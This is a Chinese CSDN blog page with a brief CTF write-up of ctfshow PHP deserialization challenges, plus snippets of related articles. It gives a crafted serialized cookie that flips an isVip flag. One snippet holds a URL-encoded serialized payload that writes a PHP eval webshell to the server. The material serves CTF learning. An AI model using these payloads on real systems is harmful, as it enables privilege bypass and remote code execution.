ctfshow-web-反序列化

最新推荐文章于 2024-03-23 21:59:37 发布
最新推荐文章于 2024-03-23 21:59:37 发布
阅读量128 收藏
点赞数 2
分类专栏: CTF-WEB 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xunyue88/article/details/136219264
版权
文章讲述了作者在Web开发中遇到的问题,发现了一个GET请求参数被用作序列化,实际上与isVip属性相关,但误导性地与unserialize函数关联。作者强调了VIP权限验证的重要性,以及GET参数序列化在安全方面的潜在陷阱。
摘要由CSDN通过智能技术生成

  1. web254
    第一眼找unserialize函数,结果没有;再找echo flag,有;再找类里面的属性,3个;再看看到居然有GET直接传参。。。直接?username=xxxxxx&password=xxxxxx

  2. web255
    GET的两个参数和反序列化无关,就不用写进去,主要让VIP变成ture就行。
    O:11:“ctfShowUser”:1{s:5:“isVip”;b:1}(这里少打一个;把我坑死了QAQ)加上还要URL输入才行,抓包输入的序列化都要URL输入吗?mark一下。GET就不记了

       Cookie:user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

  3. web256

Xunyue88
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web入门——反序列化
m0_74093152的博客
06-25 1141
代码审计,上传username=xxxxxx&password=xxxxxx即可获得flag。
[ctfshow-web]反序列化
nareku的博客
07-25 256
PHP中的魔术变量__sleep()//执行serialize()时,先会调用这个函数__wakeup()//将在反序列化之后立即调用(当反序列化时变量个数与实际不符时绕过)__construct()//当对象被创建时,会触发进行初始化__destruct()//对象被销毁时触发//当一个对象被当作字符串使用时触发__call()//在对象上下文中调用不可访问的方法时触发__callStatic()//在静态上下文中调用不可访问的方法时触发。......
【CTFSHOW】web入门反序列化
7ruth0hn的博客
07-25 2636
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
java反序列化漏洞在CTF中的利用
m0_64893612的博客
03-01 1017
序列化指的是将对象或数据结构转换为可存储或传输的格式的过程,实现的方法是;反序列化则反之,实现的方法是,可以简单地理解为将文件压缩和解压缩的过程。与PHP中反序列互相触发魔法函数导致的漏洞成因不同,java反序列化漏洞的成因主要是由于java序列化和反序列化机制的设计特点所致,简单地讲,只要反序列化代码中含有危险的命令代码,且该代码的参数是可控的,那它就存在该漏洞。漏洞原理在我今天这里不是重要的,我主要想记录的是该漏洞的利用方式。通常在解题中如果你看到一段字符串以rO0AB。
CTFshow-WEB入门-反序列化
feng的博客
02-14 5515
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
grpc-web-error-details:在grpc-web反序列化`grpc-status-details-bin`元数据的实用程序功能
05-15
使用时反序列化grpc-web-details-bin元数据值的实用程序功能。 动机 。 由错误状态代码和可选的字符串错误消息组成的标准错误模型是“官方” gRPC错误模型。 如果您使用的是协议缓冲区,则还可以使用Google开发和...
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
S24-C3P0反序列化1
08-03
S24-C3P0反序列化1 S24-C3P0反序列化是指利用C3P0结合ROME二次反序列化注入内存马的漏洞攻击方法。该攻击方法主要利用fastjson的反序列化漏洞,结合C3P0和ROME的反序列化机制,实现远程代码执行的攻击。 在了解S24...
03-03-02-序列化和反序列化1
08-04
Java编程中,序列化(Serialization)和反序列化(Deserialization)是将对象转换为字节流和从字节流恢复对象的过程,这在多种场景下非常有用,例如持久化存储、网络传输或者跨进程通信。在本例中,我们将讨论如何...
cpp-cerealC11序列化库
08-15
4. **序列化和反序列化**:调用`archive(cereal::XMLOutputArchive)`等函数将对象序列化到流中,或者使用`archive(cereal::XMLInputArchive)`从流中恢复对象。 5. **选择序列化格式**:根据需求选择合适的序列化...
CTFSHOW-反序列化
Yb_140的博客
04-06 3522
web254 直接构造 ?username=xxxxxx&password=xxxxxx web255 这关开始使用cookie进行反序列化 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; public function checkVip(){ return $this->
从CTF学习Java反序列化
why811的博客
08-18 866
我们可以看到cookie里面返回了Java序列化内容,带着cookie访问返回了hello {{username}}的字符,说明我们传入的cookie被反序列化了。其实看到LogHandler不能反序列化的时候,直接一口否定了他的可利用性,并没有去尝试,那么为什么不实际尝试一下呢?其实再仔细一点,可以发现这个类继承了HashSet,HashSet实现了Serializable接口,貌似可以搞事。(但是打final的时候是没有公网的,附件只有源码,需要去靶机上面把本地repo拖下来。
ctfshow的web入门->反序列化
2301_80481202的博客
03-23 1182
运行得到:O%3A10%3A%22ctfshowvip%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22877.php%22%3Bs%3A8%3A%22password%22%3Bs%3A25%3A%22%3C%3Fphp+%40eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3B%7D。file_get_contents('php://input')代码中的这一句可以访问请求的原始数据流,可以获取到GET和POST的数据。
CTFshow反序列化
2302_80044238的博客
03-23 916
这关很简单虽然在反序列化里但是这关并没有反序列化直接payload:?
CTFSHOW web入门 java反序列化web855
羽的博客
12-13 1924
ctfshow java反序列化
ctfshow web入门-反序列化
akxnxbshai的博客
05-19 1212
反序列化中常用的魔术方法: __wakeup() //执行unserialize()时,先会调用这个函数 __sleep() //执行serialize()时,先会调用这个函数 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法 __set() //用于将数据写入不可访问的属性 _.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8349
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
pillow-10.4.0-pp39-pypy39_pp73-macosx_11_0_arm64.whl
07-27
基本介绍 名称与起源:Pillow,原名为PIL(Python Imaging Library),但PIL只支持Python 2版本。随着Python 3的普及,Pillow作为PIL的一个分支出现,兼容Python 3并提供更多的功能和改进。 主要功能:Pillow支持多种图像格式的打开、保存、显示以及基本的图像操作和处理,如裁剪、缩放、旋转、翻转、滤镜应用等。 跨平台性:Pillow库可以在不同的操作系统上运行,包括Windows、Linux和MacOS等。 主要功能模块 Pillow库包含多个功能模块,每个模块都提供了特定的图像处理功能。以下是一些常用的模块: Image:用于处理图像文件,提供打开、保存、调整大小、旋转、裁剪、滤镜等功能。 ImageDraw:提供在图像上绘制各种形状(如线条、矩形、圆形)和文本的功能。 ImageFont:用于加载和使用TrueType字体文件,以便在图像上绘制文本时设置字体样式、大小和颜色。 ImageFilter:提供各种滤镜效果,如模糊、锐化、边缘增强等,用于图像增强、特效处理和图像识别等应用。 ImageEnhance:用于调整图像的亮度、对比度、颜色饱和度等参数,使图像更加清晰、明亮或具有特定的调色效果。 高级功能 除了基本的图像处理功能外,Pillow还支持一些高级功能,如色彩空间转换、直方图均衡化等。这些功能可以帮助用户进行更复杂的图像处理和分析。
avif-0.5.0-cp35-cp35m-macosx_10_9_x86_64.whl
最新发布
07-27
python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决!
Java对象序列化与反序列化详解
"Java对象的序列化与反序列化技术详解" Java对象的序列化与反序列化Java编程中的一项重要技术,它允许我们将Java对象转换为字节流,以便于存储或在网络中传输。这章内容主要涵盖以下几个方面: 1. **对象序列化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值